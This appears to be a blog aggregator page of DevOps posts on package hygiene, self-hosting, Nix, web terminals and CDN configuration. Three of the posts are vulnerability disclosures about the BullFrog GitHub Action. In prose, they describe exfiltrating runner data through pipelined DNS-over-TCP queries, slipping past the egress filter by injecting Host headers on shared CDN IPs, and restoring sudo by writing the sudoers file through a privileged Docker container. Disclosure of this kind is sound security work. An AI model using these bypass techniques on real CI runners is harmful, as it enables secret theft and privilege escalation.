Posts in Devops (20 found)
daniel.haxx.se 2 days ago

chicken nuget

Background: nuget.org is a Microsoft owned and run service that allows users to package software and upload it to nuget so that other users can download it. It is targeted for .Net developers but there is really no filter in what you can offer through their service. Three years ago I reported on how nuget was hosting and providing ancient, outdated and insecure curl packages. Random people download a curl tarball, build curl and then upload it to nuget, and nuget then offers those curl builds to the world – forever. To properly celebrate the three year anniversary of that blog post, I went back to nuget.org , entered curl into the search bar and took a look at the results. I immediately found at least seven different packages where people were providing severely outdated curl versions. The most popular of those, rmt_curl , reports that it has been downloaded almost 100,000 times over the years and is still downloaded almost 1,000 times/week the last few weeks. It is still happening . The packages I reported three years ago are gone, but now there is a new set of equally bad ones. No lessons learned. rmt_curl claims to provide curl 7.51.0, a version we shipped in November 2016. Right now it has 64 known vulnerabilities and we have done more than 9,000 documented bugfixes since then. No one in their right mind should ever download or use this version. Conclusion: the state of nuget is just as sad now as it was three years ago and this triggered another someone is wrong on the internet moments for me. I felt I should do my duty and tell them. Again. Surely they will act this time! Surely they think of the security of their users? The entire nuget concept is setup and destined to end up like this: random users on the internet put something together, upload it to nuget and then the rest of the world downloads and uses those things – trusting that whatever the description says is accurate and well-meaning. Maybe there are some additional security scans done in the background, but I don’t see how anyone can know that they don’t contain any backdoors, trojans or other nasty deliberate attacks. And whatever has been uploaded once seems to then be offered in perpetuity. Like three years ago I listed a bunch of severely outdated curl packages in my report. nuget says I can email them a report, but that just sent me a bounce back saying they don’t accept email reports anymore. (Sigh, and yes I reported that as a separate issue.) I was instead pointed over to the generic Microsoft security reporting page where there is not even any drop-down selection to use for “nuget” so I picked “.NET” instead when I submitted my report. Almost identically to three years ago, my report was closed within less than 48 hours. It’s not a nuget problem they say. Thank you again for submitting this report to the Microsoft Security Response Center (MSRC). After careful investigation, this case has been assessed as not a vulnerability and does not meet Microsoft’s bar for immediate servicing. None of these packages are Microsoft owned, you will need to reach out directly to the owners to get patched versions published. Developers are responsible for removing their own packages or updating the dependencies. In other words: they don’t think it’s nuget’s responsibility to keep the packages they host, secure and safe for their users. I should instead report these things individually to every outdated package provider, who if they cared, would have removed or updated these packages many years ago already. Also, that would imply a never-ending wack-a-mole game for me since people obviously keep doing this. I think I have better things to do in my life. In the cases I reported, the packages seem to be of the kind that once had the attention and energy by someone who kept them up-to-date with the curl releases for a while and then they stopped and since then the packages on nuget has just collected dust and gone stale. Still, apparently users keep finding and downloading them, even if maybe not at terribly high numbers. Thousands of fooled users per week is thousands too many. The uploading users are perfectly allowed to do this, legally, and nuget is perfectly allowed to host these packages as per the curl license. I don’t have a definite answer to what exactly nuget should do to address this problem once and for all, but as long as they allow packages uploaded nine years ago to still get downloaded today, it seems they are asking for this. They contribute and aid users getting tricked into downloading and using insecure software , and they are indifferent to it. A rare few applications that were uploaded nine years ago might actually still be okay but those are extremely rare exceptions. The last time I reported this nuget problem nothing happened on the issue until I tweeted about it. This time around, a well-known Microsoft developer (who shall remain nameless here) saw my Mastodon post about this topic when mirrored over to Bluesky and pushed for the case internally – but not even that helped. The nuget management thinks this is okay. If I were into puns I would probably call them chicken nuget for their unwillingness to fix this. Maybe just closing our eyes and pretending it doesn’t exist will just make it go away? Absolutely no one should use nuget.

0 views
iDiallo 4 days ago

The Server Older than my Kids!

This blog runs on two servers. One is the main PHP blog engine that handles the logic and the database, while the other serves all static files. Many years ago, an article I wrote reached the top position on both Hacker News and Reddit. My server couldn't handle the traffic . I literally had a terminal window open, monitoring the CPU and restarting the server every couple of minutes. But I learned a lot from it. The page receiving all the traffic had a total of 17 assets. So in addition to the database getting hammered, my server was spending most of its time serving images, CSS and JavaScript files. So I decided to set up additional servers to act as a sort of CDN to spread the load. I added multiple servers around the world and used MaxMindDB to determine a user's location to serve files from the closest server . But it was overkill for a small blog like mine. I quickly downgraded back to just one server for the application and one for static files. Ever since I set up this configuration, my server never failed due to a traffic spike. In fact, in 2018, right after I upgraded the servers to Ubuntu 18.04, one of my articles went viral like nothing I had seen before . Millions of requests hammered my server. The machine handled the traffic just fine. It's been 7 years now. I've procrastinated long enough. An upgrade was long overdue. What kept me from upgrading to Ubuntu 24.04 LTS was that I had customized the server heavily over the years, and never documented any of it. Provisioning a new server means setting up accounts, dealing with permissions, and transferring files. All of this should have been straightforward with a formal process. Instead, uploading blog post assets has been a very manual affair. I only partially completed the upload interface, so I've been using SFTP and SCP from time to time to upload files. It's only now that I've finally created a provisioning script for my asset server. I mostly used AI to generate it, then used a configuration file to set values such as email, username, SSH keys, and so on. With the click of a button, and 30 minutes of waiting for DNS to update, I now have a brand new server running Ubuntu 24.04, serving my files via Nginx. Yes, next months Ubuntu 26.04 LTS comes out, and I can migrate it by running the same script. I also built an interface for uploading content without relying on SFTP or SSH, which I'll be publishing on GitHub soon. It's been 7 years running this server. It's older than my kids. Somehow, I feel a pang of emotion thinking about turning it off. I'll do it tonight... But while I'm at it, I need to do something about the 9-year-old and 11-year-old servers that still run some crucial applications.

0 views

Starting My Personal Matrix Homeserver

I initially explored Matrix several years ago. It seemed promising, yet about as active as your average IRC channel and lacking most features one would like in a chat platform. Since Discord's relatively recent announcement about age-verification , and their more long-standing problem of slowly boiling their users like frogs with more and more paywalling basic features, I have revisited any and all alternatives for the platform. Out of all the ones I've tried so far, Matrix is the most promising to me. It can be self-hosted, it is federated so that I can communicate with communities outside of my server, and moderation has improved significantly. There are also more features and better clients since I last checked on it; even more clients are getting an increase of attention due to Discord expats. Because of its improvements, I would say it has reached a point that it fits my needs. I have also learned so much and can confidently handle hosting this sort of thing now. I have been socializing on some great spaces so far, starting from Matrix United (#matrixunited-space:matrix.org) and MatrixRooms.info . The Apple room is especially active and has a lot of nice people. I recently finished starting my own server, called snowberry.social, home page on https://snowberry.social with a guide on what Matrix is and the focus of my server. Registration is currently restricted out of respect to my own time and energy, 1 and I have a few friends on there who have been open to the idea of leaving Discord, or at least trying something else. Recently, I have been open to making a completely public space for like-minded people focused on making a better social life on the internet. Topics include hosting your own software and applications, blogging, RSS, federated platforms, gaming, and more. Despite (or maybe because?) my server has been so stable and easy to manage so far, I am hesitant to allow registration on my server, but am open to using federation for people to join this space. However, I am torn since I know the majority of users join the general matrix.org server, further centralizing Matrix, not to mention that Matrix may introduce their own age-verification to comply with future laws(?) . I can't say I have a solid decision as of the writing of this post, but am open to discussion, and people who I have talked to before can request a registration token from me to join my homeserver. Feel free to join my newly created space with any Matrix account at #community:snowberry.social . I should note that when using matrix.to or mobile clients, you may be prompted to make an account at matrix.org by default. If you want to use/register under a different homeserver, you have to change it to your preferred one. Why is it called "Snowberry Social"? I am a huge Skyrim/Elder Scrolls fan, and one of the alchemical ingredients is a snowberry . It's cute. Setting up the full-featured stack for Matrix seemed incredibly daunting at first. It still is, although much less so now that I have it already made. The guide I followed, and that I recommend to anyone, is the matrix docker ansible deploy repo . Using an ansible playbook, you can easily set up a server with optional configurations and services. From the GitHub page, This Ansible playbook is meant to help you run your own Matrix homeserver, along with the various services related to that. That is, it lets you join the Matrix network using your own user ID like @alice:example.com, all hosted on your own server (see prerequisites). We run all supported services in Docker containers (see the container images we use), which lets us have a predictable and up-to-date setup, across multiple supported distros (see prerequisites) and architectures (x86/amd64 being recommended). Installation (upgrades) and some maintenance tasks are automated using Ansible (see our Ansible guide). If you are interested in pursuing this, I highly recommend reading and re-reading every instruction , or you might get horribly frustrated depending on your technical experience. Follow every little pre-requisite, learn what in the world an ansible playbook is, learn what DNS is, and maybe be ready to wipe your VPS/container/whatever after screwing things up. 2 Some things I ran into while trying this: What files to configure, SSH key permission issues, ports being closed. This is why I went with a VPS instead of my usual hardware, since port forwarding is simple and easy. This playbook even starts a web server for you in order to serve files, needed for federation capabilities. I highly recommend checking it out and reading through everything you can do with it. What everyone wants to know: can I use it on a daily basis without ripping my hair out? Sure. If you're a disgruntled Discord user, Matrix is not Discord. The layout (depends on client) and features are much more geared toward a WhatsApp, Facebook Messenger, or even Slack alternative. By default, it does not support custom emotes/stickers and does not have "servers" with "channels" in "categories" like the average Discord user prefers. However, you can have spaces with rooms in subspaces . Furthermore, the client you choose can greatly affect your experience. The official client, and the most user-friendly in my opinion, is Element/Element X. 3 Available on the web, or as an app on iOS, Android, macOS, Linux, and Windows. It is developed and maintained by the same team who developed and maintained the Matrix protocol. Other options are shown in the comparison table below, and a few image showcases can be found under the same table on https://snowberry.social . If you like Discord, Cinny and Commet are great desktop options. I personally use Cinny on macOS, and FluffyChat on my iPhone. They both support custom emotes/stickers, which my friends also value. No limits on custom emoji use like Discord's paywalls! Does FluffyChat's choice of gradients and color themes for their app drive me a little insane because it's ugly? Yes, lol. Give Matrix a spin on matrix.org and move to a different homeserver if you prefer later. Join my space and see if we can make a community that's federated, decentralized, and private. I had a lot of fun setting this up and I have a lot of fun talking to others using it! There are whole communities out there waiting for discussions to blossom. Subscribe via email or RSS Registration is token-based using matrix-registration-bot . This means that users can only register when given a randomly generated string of characters and entering it upon account creation. ↩ You do have a VPS , right? (See also this Reddit discussion on why self-hosters use them). ↩ Element X is the newest version of Element. ↩ Registration is token-based using matrix-registration-bot . This means that users can only register when given a randomly generated string of characters and entering it upon account creation. ↩ You do have a VPS , right? (See also this Reddit discussion on why self-hosters use them). ↩ Element X is the newest version of Element. ↩

0 views
daniel.haxx.se 4 days ago

Dependency tracking is hard

curl and libcurl are written in C. Rather low level components present in many software systems. They are typically not part of any ecosystem at all. They’re just a tool and a library. In lots of places on the web when you mention an Open Source project, you will also get the option to mention in which ecosystem it belongs. npm, go, rust, python etc. There are easily at least a dozen well-known and large ecosystems. curl is not part of any of those. Recently there’s been a push for PURLs ( Package URLs ), for example when describing your specific package in a CVE. A package URL only works when the component is part of an ecosystem. curl is not. We can’t specify curl or libcurl using a PURL. SBOM generators and related scanners use package managers to generate lists of used components and their dependencies . This makes these tools quite frequently just miss and ignore libcurl. It’s not listed by the package managers. It’s just in there, ready to be used. Like magic. It is similarly hard for these tools to figure out that curl in turn also depends and uses other libraries. At build-time you select which – but as we in the curl project primarily just ships tarballs with source code we cannot tell anyone what dependencies their builds have. The additional libraries libcurl itself uses are all similarly outside of the standard ecosystems. Part of the explanation for this is also that libcurl and curl are often shipped bundled with the operating system many times, or sometimes perceived to be part of the OS. Most graphs, SBOM tools and dependency trackers therefore stop at the binding or system that uses curl or libcurl, but without including curl or libcurl. The layer above so to speak. This makes it hard to figure out exactly how many components and how much software is depending on libcurl. A perfect way to illustrate the problem is to check GitHub and see how many among its vast collection of many millions of repositories that depend on curl. After all, curl is installed in some thirty billion installations, so clearly it used a lot . (Most of them being libcurl of course.) It lists one dependency for curl. Repositories that depend on curl/curl: one. Screenshot taken on March 9, 2026 What makes this even more amusing is that it looks like this single dependent repository ( Pupibent/spire ) lists curl as a dependency by mistake.

0 views
Farid Zakaria 1 weeks ago

Nix is a lie, and that’s ok

When Eelco Dolstra , father of Nix, descended from the mountain tops and enlightened us all, one of the main commandments for Nix was to eschew all uses of the Filesystem Hierarchy Standard (FHS) . The FHS is the “find libraries and files by convention” dogma Nix abandons in the pursuit of purity. What if I told you that was a lie ? 😑 Nix was explicitly designed to eliminate standard FHS paths (like or ) to guarantee reproducibility. However, graphics drivers represent a hard boundary between user-space and kernel-space. The user-space library ( ) must match the host OS’s kernel module and the physical GPU. Nearly all derivations do not bundle with them because they have no way of predicting the hardware or host kernel the binary will run on. What about NixOS? Surely, we know what kernel and drivers we have there!? 🤔 Well, if we modified every derivation to include the correct it would cause massive rebuilds for every user and make the NixOS cache effectively useless. To solve this, NixOS & Home Manager introduce an intentional impurity, a global path at where derivations expect to find . We’ve just re-introduced a convention path à la FHS. 🫠 Unfortunately, that leaves users who use Nix on other Linux distributions in a bad state which is documented in issue#9415 , that has been opened since 2015. If you tried to install and run any Nix application that requires graphics, you’ll be hit with the exact error message Nix was designed to thwart: There are a couple of workarounds for those of us who use Nix on alternate distributions: For those of us though who cling to the beautiful purity of Nix however it feels like a sad but ultimately necessary trade-off. Thou shall not use FHS, unless you really need to. nixGL , a runtime script that injects the library via manually hacking creating your own and symlinking it with the drivers from

0 views

How to Host your Own Email Server

I recently started a new platform where I sell my books and courses, and in this website I needed to send account related emails to my users for things such as email address verification and password reset requests. The reasonable option that is often suggested is to use a paid email service such as Mailgun or SendGrid. Sending emails on your own is, according to the Internet, too difficult. Because the prospect of adding yet another dependency on Big Tech is depressing, I decided to go against the general advice and roll my own email server. And sure, it wasn't trivial, but it wasn't all that hard either! Are you interested in hosting your own email server, like me? In this article I'll tell you how to go from nothing to being able to send emails that are accepted by all the big email players. My main concern is sending, but I will also cover the simple solution that I'm using to receive emails and replies.

0 views
Karan Sharma 1 weeks ago

A Web Terminal for My Homelab with ttyd + tmux

I wanted a browser terminal at that works from laptop, tablet, and phone without special client setup. The stack that works cleanly for this is ttyd + tmux. Two decisions matter most: Why each flag matters: reverse proxies to with TLS via Cloudflare DNS challenge. Because ttyd uses WebSockets heavily, reverse proxy support for upgrades is essential. I tuned tmux for long-running agent sessions, not just manual shell use. This was a big pain point, so I added both workflows: Browser-native copy tmux copy mode On mobile, ttyd’s top-left menu (special keys) makes prefix navigation workable. This is tailnet-only behind Tailscale. No public exposure. Still, the container has and , which is a strong trust boundary. If you expose anything like this publicly, add auth in front and treat it as high-risk infrastructure. The terminal is now boring in the best way: stable, predictable, and fast to reach from any device. handles terminal-over-websocket behavior well. enforces a single active client, which avoids cross-tab resize contention. : writable shell : matches my existing Caddy upstream ( ) : one active client only (no resize fight club) : real host shell from inside the container : correct login environment and tmux config loading : persistent attach/re-attach status line shows host + session + path + time pane border shows pane number + current command active pane is clearly highlighted : create/attach named session : create named window : rename window : session/window picker : pane movement : pane resize Browser-native copy to turn tmux mouse off drag-select + browser copy shortcut to turn tmux mouse back on tmux copy mode enters copy mode and shows select, copy (shows ) or exits (shows )

0 views
David Bushell 1 weeks ago

Bunny.net shared storage zones

Whilst moving projects off Cloudflare and migrating to Bunny I discovered a neat ‘Bunny hack’ to make life easier. I like to explicitly say “no” to AI bots using AI robots.txt † . Updating this file across multiple websites is tedious. With Bunny it’s possible to use a single file. † I’m no fool, I know the AI industry has a consent problem but the principle matters. My solution was to create a new storage zone as a single source of truth. In the screenshot above I’ve uploaded my common file to its own storage zone. This zone doesn’t need any “pull zone” (CDN) connected. The file doesn’t need to be publicly accessible by itself here. With that ready I next visited each pull zone that will share the file. Under “CDN > Edge rules” in the menu I added the following rule. I chose the action: “Override Origin: Storage Zone” and selected the new shared zone. Under conditions I added a “Request URL” match for . Using a wildcard makes it easier to copy & paste. I tried dynamic variables but they don’t work for conditions. I added an identical edge rule for all websites I want to use the . Finally, I made sure the CDN cache was purged for those URLs. This technique is useful for other shared assets like a favicon, for example. Neat, right? One downside to this approach is vendor lock-in. If or when Bunny hops the shark and I migrate elsewhere I must find a new solution. My use case for is not critical to my websites functioning so it’s fine if I forget. Thanks for reading! Follow me on Mastodon and Bluesky . Subscribe to my Blog and Notes or Combined feeds.

0 views
devansh 1 weeks ago

Bypassing egress filtering in BullFrog GitHub Action using shared IP

This is the third vulnerability I'm disclosing in BullFrog, alongside a Bypassing egress filtering in BullFrog GitHub Action and a sudo restriction bypass in BullFrog GitHub Action . Unlike those two, which exploit specific implementation gaps, this one is a fundamental design flaw, the kind that doesn't have a quick patch because it stems from how the filtering is architected. BullFrog markets itself as a domain-based egress filter. You give it a list of domains you trust, set , and everything else should be denied. The operative word there is should . When a workflow step makes a DNS query, BullFrog intercepts the DNS response and inspects the queried domain name against your allowlist. If the domain is allowed, BullFrog takes the resolved IP address from the DNS answer and adds it to a system-level firewall whitelist (nftables). From that point on, any traffic to that IP is permitted, no further domain-level inspection. BullFrog operates at the network layer (Layer 3) and transport layer (Layer 4). It can see IP addresses and ports. It cannot see HTTP Host headers, TLS SNI values, or any application-layer content. That's a Layer 7 problem, and BullFrog doesn't go there. The modern internet is not a one-to-one mapping of domains to IP addresses. It never really was, but today it's dramatic, a single IP address on a CDN like Cloudflare or CloudFront can serve hundreds of thousands of distinct domains. BullFrog's model assumes an IP corresponds to one domain (or at least one trusted context). That assumption is wrong. Consider what gets whitelisted in a typical CI workflow: Every one of these resolves to infrastructure shared with thousands of other tenants. The moment BullFrog whitelists the IP for a registry, it has also implicitly whitelisted every other domain on that same Cloudflare edge node, including an attacker's domain pointing to the same IP. Once an allowed domain is resolved and its IP is added to the nftables whitelist, an attacker can reach any other domain on that same IP by: BullFrog never sees the Host header. The firewall sees a packet destined for a permitted IP and passes it through. The server on the other end sees the injected Host header and responds with content from an entirely different, supposedly blocked domain. The flaw lives in at agent/agent.go#L285 : Two problems in one function. First, opens the IP without any application-layer binding, all traffic to that IP is permitted, not just traffic for the domain that triggered the rule. Second, the branch in the else-if means that even a DNS query for a blocked domain gets logged as "allowed" if its IP happens to already be in the whitelist. The policy has effectively already been bypassed before the HTTP connection is even made. This PoC uses a DigitalOcean droplet running Nginx with two virtual hosts on the same IP — one "good" (allowed by BullFrog policy), one "evil" (blocked). is used as a wildcard DNS service so no domain purchase is needed. SSH into your droplet and run: Both domains resolve to the same droplet IP. BullFrog will only be told to allow . The final step returns — served by the "evil" virtual host, through a connection BullFrog marked as allowed, to a domain BullFrog was explicitly told to block. The DigitalOcean + nip.io setup is a controlled stand-in for the real threat model, which is considerably worse. Consider what actually gets whitelisted in production CI workflows: An attacker doesn't need to compromise the legitimate service. They just need to host their C2 or exfiltration endpoint on the same CDN, and inject the right Host header. The guarantee evaporates entirely for any target on shared infrastructure, which in practice means most of the internet. How BullFrog's Egress Filtering Works The Layer 3/4 Problem Shared Infrastructure is Everywhere Vulnerability Vulnerable Code Proof of Concept Infrastructure Setup The Workflow Real-World Impact Disclosure Timeline You have a dependency registry → Cloudflare CDN You have a static files resource → Azure CDN Some blog storage hosted on cloud → Google infrastructure Using the allowed domain's URL (so the connection goes to the already-whitelisted IP — no new DNS lookup, no new policy check) Injecting a different header to tell the server which virtual host to serve Your dependency registry resolves to Cloudflare. An attacker with any domain on Cloudflare can receive requests from that runner once the registry IP is whitelisted. Your static file reserve resolves to Azure CDN. Every GitHub Actions workflow that pulls artifacts whitelists a slice of Azure's IP space. Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026

0 views
David Bushell 1 weeks ago

MOOving to a self-hosted Bluesky PDS

Bluesky is a “Twitter clone” that runs on the AT Protocol . I have to be honest, I’d struggle to explain how atproto works. I think it’s similar to Nostr but like, good? When atproto devs talk about The Atmosphere they sound like blockchain bros. The marketing needs consideration. Bluesky however, is a lot of fun. Feels like early Twitter. Nobody cool uses Twitter anymore ever. It’s a cesspit of racists asking Gork to undress women. Mastodon and Bluesky are the social platforms I use. I’ve always been tempted to self-host my own Mastodon instance but the requirements are steep. I use the omg.lol server instead. Self-hosting the Bluesky PDS is much less demanding. My setup includes: This is the host machine I glued an NVMe onto the underside. All services run as Docker containers for easy security sandboxing. I say easy but it took many painful years to master Docker. I have the Pi on a VLAN firewall because I’m extra paranoid. I setup my Bluesky PDS using the official Docker container. It’s configure with environment variables and has a single data volume mounted. I backup that volume to my NAS. I’ve put Caddy in front of the PDS container. Right now it just acts as a reverse proxy. This gives me flexibility later if I want to add access logs, rate limiting, or other plugins. Booo! If you know a good European alternative please let me know! The tunnel links Caddy to the outside world via Cloudflare to avoid exposing my home IP address. Cloudflare also adds an extra level of bot protection. The guides I followed suggest adding wildcard DNS for the tunnel. Cloudflare has shuffled the dashboard for the umpteenth time and I can’t figure out how. I think sub-domains are only used for user handles, e.g. . I use a different custom domain for my handle ( ) with a manual TXT record to verify. Allowing the PDS to send emails isn’t strictly necessary. It’s useful for password resets and I think it’ll send a code if I migrate PDS again. I went through the hassle of adding my PDS domain to Proton Mail and followed their SMTP guide . This shows how the PDS enviornment variables are formatted. It took me forever to figure out where the username and password went. PDS MOOver by Bailey Townsend is the tool that does the data migration. It takes your Bluesky password and probably sees your private key, so use at your own risk! I setup a new account to test it before I YOLO’d my main. MOOve successful! I still login at but I now select “custom account provider” and enter my PDS domain. SkyTools has a tool that confirms it. Bluesky Debug can check handles are verified correctly. PDSIs.dev is a neat atproto explorer. I cross-referenced the following guides for help: Most of the Cloudflare stuff is outdated because Cloudflare rolls dice every month. Bluesky is still heavily centralised but the atproto layer allows anyone to control their own data. I like doing that on principle. I don’t like maintenance, but I’ve heard that’s minimal for a PDS. Supposedly it’s possible to migrate back to Bluesky’s PDS if I get bored. I’m tempted to build something in The Atmosphere . Any ideas? Thanks for reading! Follow me on Mastodon and Bluesky . Subscribe to my Blog and Notes or Combined feeds. Notes on Self Hosting a Bluesky PDS Alongside Other Services Self-host federated Bluesky instance (PDS) with CloudFlare Tunnel Host a PDS via a Cloudflare Tunnel Self-hosting Bluesky PDS

1 views
Tara's Website 1 weeks ago

Flight record about MinIO

Flight record about MinIO I wanted to leave a small flight record for my future self about what happened to MinIO. By the time I reread this, it will be old news. That is fine. This is less about the timeline and more about what it reminded me about my own preferences. I recently wrote about a data-first view of systems, where programs are transient and data is the center of gravity.

0 views
./techtipsy 1 weeks ago

The cloud just stopped scaling

It has happened. The cloud just stopped scaling. Hetzner’s cloud, for now. At this rate, my home server will actually have to become production at work, and my gaming PC has to be converted to a server because it has a whopping 32 GB of RAM and 6 good CPU cores. With Forza Horizon 6 on the horizon , it is time for some difficult decisions… Shortly after publishing this post, AWS had a different type of issue with availability zones going down due to… Iranian missile strikes. I’ve wanted decentralized hosting to be more popular, but not like this.

0 views
devansh 2 weeks ago

sudo restriction bypass via Docker Group in BullFrog GitHub Action

Least privilege is one of those security principles that everyone agrees with and almost nobody fully implements. In the GitHub Actions context, it means your workflow steps should only have the access they actually need, and no more. Running arbitrary third-party actions or build scripts as a user with unrestricted is a liability, one compromised dependency, one malicious action, and an attacker owns the runner. BullFrog , the egress-filtering agent for GitHub Actions I wrote about previously , ships a feature called specifically to address this. Set it and BullFrog removes sudo access for all subsequent steps in the job, or so it claims. is a BullFrog configuration option that, when set to , strips sudo privileges from the runner user for all steps that follow the BullFrog setup step. It's designed as a privilege reduction primitive, you harden the environment early in the job so that nothing downstream can accidentally (or intentionally) run as root. A typical hardened workflow looks like this: After this step, should fail, and subsequent steps should be constrained to what the unprivileged user can do. BullFrog achieves this by modifying the sudoers configuration, essentially removing or neutering the runner user's sudo entry. This works at the command level, the binary is still there, but the policy that would grant elevation is gone. On GitHub-hosted Ubuntu runners, the user is already a member of the group. This means the runner user can spawn Docker containers without sudo, no privilege escalation required to get Docker running. And Docker, when given and a host filesystem mount, is essentially root with extra steps. A privileged container with can write anywhere on the host filesystem, including . The sudo restriction is applied at one layer. Docker punches straight through to the layer below it. The feature only removes the sudoers entry for the runner user. It does not restrict Docker access, does not drop the runner from the group, and does not prevent privileged container execution. Because Docker daemon access is equivalent to root access on the host, the sudo restriction can be fully reversed in a single command — no password, no escalation, no interaction required. This drops a sudoers rule back into place by writing through the container's view of the host filesystem. After this, succeeds again and the runner has full root access for the rest of the job. The following workflow demonstrates the full bypass, disable sudo with BullFrog, confirm it's gone, restore it via Docker, confirm it's back: The workflow output confirms the sequence cleanly, BullFrog disables sudo, the verification step passes, Docker writes the sudoers rule, and the final step confirms full sudo access is back — all within the same job, all as the unprivileged user, no external dependencies beyond the Docker image. Reported to the BullFrog team on November 28th, 2025. No response, acknowledgment, or fix was issued in the roughly three months that followed. Disclosing publicly now. This is the second BullFrog vulnerability I'm disclosing simultaneously due to the same lack of response — see also: Bypassing egress filtering in BullFrog GitHub Action ). Affected Versions : v0.8.4 and likely all prior versions Fixed Versions : None as of disclosure date (I did not bother to check) What is BullFrog's ? How Sudo is Disabled The Docker Problem Vulnerability Proof of Concept Disclosure Timeline Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026

0 views
devansh 2 weeks ago

Bypassing egress filtering in BullFrog GitHub Action

GitHub Actions runners are essentially ephemeral Linux VMs that execute your CI/CD pipelines. The fact that they can reach the internet by default has always been a quiet concern for security-conscious teams — one malicious or compromised step can silently exfiltrate secrets, environment variables, or runner metadata out to an attacker-controlled server. A handful of tools have been built to address exactly this problem. One of them is BullFrog — a lightweight egress-filtering agent for GitHub Actions that promises to block outbound network traffic to domains outside your allowlist. The idea is elegant: drop everything except what you explicitly trust. So naturally, I poked at it. BullFrog ( ) is an open-source GitHub Actions security tool that intercepts and filters outbound network traffic from your CI runners. You drop it into your workflow as a step, hand it an list and an , and it uses a userspace agent to enforce that policy on every outbound packet. A typical setup looks like this: After this step, any connection to a domain not on the allowlist should be blocked. The idea is solid. Supply chain attacks, secret exfiltration, dependency confusion — all of these require outbound connectivity. Cutting that off at the network layer is a genuinely good defensive primitive. The BullFrog agent ( ) intercepts outbound packets using netfilter queue (NFQUEUE). When a DNS query packet is intercepted, the agent inspects the queried domain against the allowlist. If the domain matches — the packet goes through. If it doesn't — dropped. For DNS over UDP, this is fairly straightforward: one UDP datagram, one DNS message. But DNS also runs over TCP, and TCP is where things get interesting. DNS-over-TCP is used when a DNS response exceeds 512 bytes (common with DNSSEC, large records, etc.), or when a client explicitly prefers TCP for reliability. RFC 1035 specifies that DNS messages over TCP are prefixed with a 2-byte length field to delimit individual messages. Crucially, the same TCP connection can carry multiple DNS messages back-to-back — this is called DNS pipelining (RFC 7766). This is the exact footgun BullFrog stepped on. BullFrog's function parses the incoming TCP payload, extracts the first DNS message using the 2-byte length prefix, checks it against the allowlist, and returns. It never looks at the rest of the TCP payload. If there are additional DNS messages pipelined in the same TCP segment, they are completely ignored. The consequence: if the first message queries an allowed domain, the entire packet is accepted — including any subsequent messages querying blocked domains. Those blocked queries sail right through to the upstream DNS server. The smoking gun is at agent/agent.go#L403 : The function slices , decodes that single DNS message, runs the policy check on it, and returns its verdict. Any bytes after — which may contain one or more additional DNS messages — are never touched. It's a classic "check the first item, trust the rest" mistake. The guard is real, but it only covers the front door. The first query acts as camouflage. The second is the actual payload — it can encode arbitrary data in the subdomain (hostname, runner name, env vars, secrets) and have it resolved by a DNS server the attacker controls. They observe the DNS lookup on their end and retrieve the exfiltrated data — no HTTP, no direct socket to a C2, no obvious telltale traffic pattern. The workflow setup to reproduce this: The script below builds two raw DNS queries, wraps each with a TCP 2-byte length prefix per RFC 1035, concatenates them into a single payload, and sends it over one TCP connection to . Runner metadata (OS, kernel release, hostname, runner name) is embedded in the exfiltration domain. Running this against a real workflow with BullFrog configured to allow only , the runner's OS, kernel version, hostname, and env variable were successfully observed in Burp Collaborator's DNS logs — proving that the second DNS query bypassed the policy entirely. I reported this to the BullFrog team on November 28th, 2025 via their GitHub repository. After roughly three months with no response, acknowledgment, or patch, I'm disclosing this publicly. The vulnerability is straightforward to exploit and affects any workflow using BullFrog with that routes DNS over TCP — which Google's supports natively. Affected Versions : v0.8.4 and likely all prior versions Fixed Versions : None as of disclosure date (did not bother to check) What is BullFrog? How It Works DNS Over TCP Vulnerability Vulnerable Code Proof of Concept Attack Scenario The PoC Script Disclosure Timeline Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026

0 views
Rik Huijzer 2 weeks ago

How To Run Services on a Linux Server

I have been running services myself for a few years on Linux servers. It took a while to figure out what works best. Here's what I've learned. First of all, all maintenance is done on headless servers via SSH. Learning this might seem daunting for some at first, but it is truly unbeatable in terms of productivity and speed. To easily log in via SSH, add the SSH keys to the server and then add the server to your `~/.ssh/config`. For example, ``` Host arnold Hostname 123.456.789.012 User rik IdentityFile ~/.ssh/arnold ``` Now you can log in via `ssh arnold` instead of having to ma...

0 views
Rik Huijzer 2 weeks ago

Setup a Syncthing service on Debian

Install via the APT instructions. Next (source): ``` useradd -u 1010 -c "Syncthing Service" -d /var/syncthing -s /usr/sbin/nologin syncthing mkdir /var/syncthing chown -R syncthing:syncthing /var/syncthing chmod 700 /var/syncthing systemctl enable [email protected] systemctl start [email protected] systemctl status [email protected] ``` Then you should be able to connect to the web GUI at `localhost:8385`. To allow this user to read files outside it's own directories, use ``` getfacl /some/other/dir ``` from `acl` (`apt-get install acl`) to view the permission...

0 views

Fixing qBittorrent in Docker, swallowing RAM and locking up the host

IntroI’ve had qBittorrent running happily in Docker for over a year now, using the linuxserver/qbittorrent image. I run the docker container and others on an Ubuntu Server host. Recently, the host regularly becomes unresponsive. SSH doesn’t work, and the only way to recover is to power cycle the server (running on a small NUC). The symptoms were: RAM usage would climb and climb, the server would become sluggish, and then it would completely lock up.

0 views
W. Jason Gilmore 2 weeks ago

Testing a Laravel MCP Server Using Herd and Claude Desktop

I recently added an MCP server to ContributorIQ , using Laravel's native MCP server integration. Creating the MCP server with Claude Code was trivial, however testing it with the MCP Inspector and Claude Desktop was not because of an SSL issue related to Laravel Herd. If you arrived at this page I suppose it is because you already know what all of these terms mean and so I'm not going to waste your time by explaining. The issue you're probably facing is because MCP clients are looking for a valid SSL certificate if https is used to define the MCP server endpoint. The fix involves setting the environment variable to . If you want to test your MCP server using the official MCP Inspector, you can set this environment variable right before running the inspector, like so: If you'd like to test the MCP server inside Claude Desktop (which is what your end users will probably do), then you'll need to set this environment variable inside . I also faced Node version issues but suspect that's due to an annoying local environment issue, but I'll include that code in the snippet just in case it's helpful: Hope this helps.

0 views
Martin Fowler 2 weeks ago

Fragments: February 23

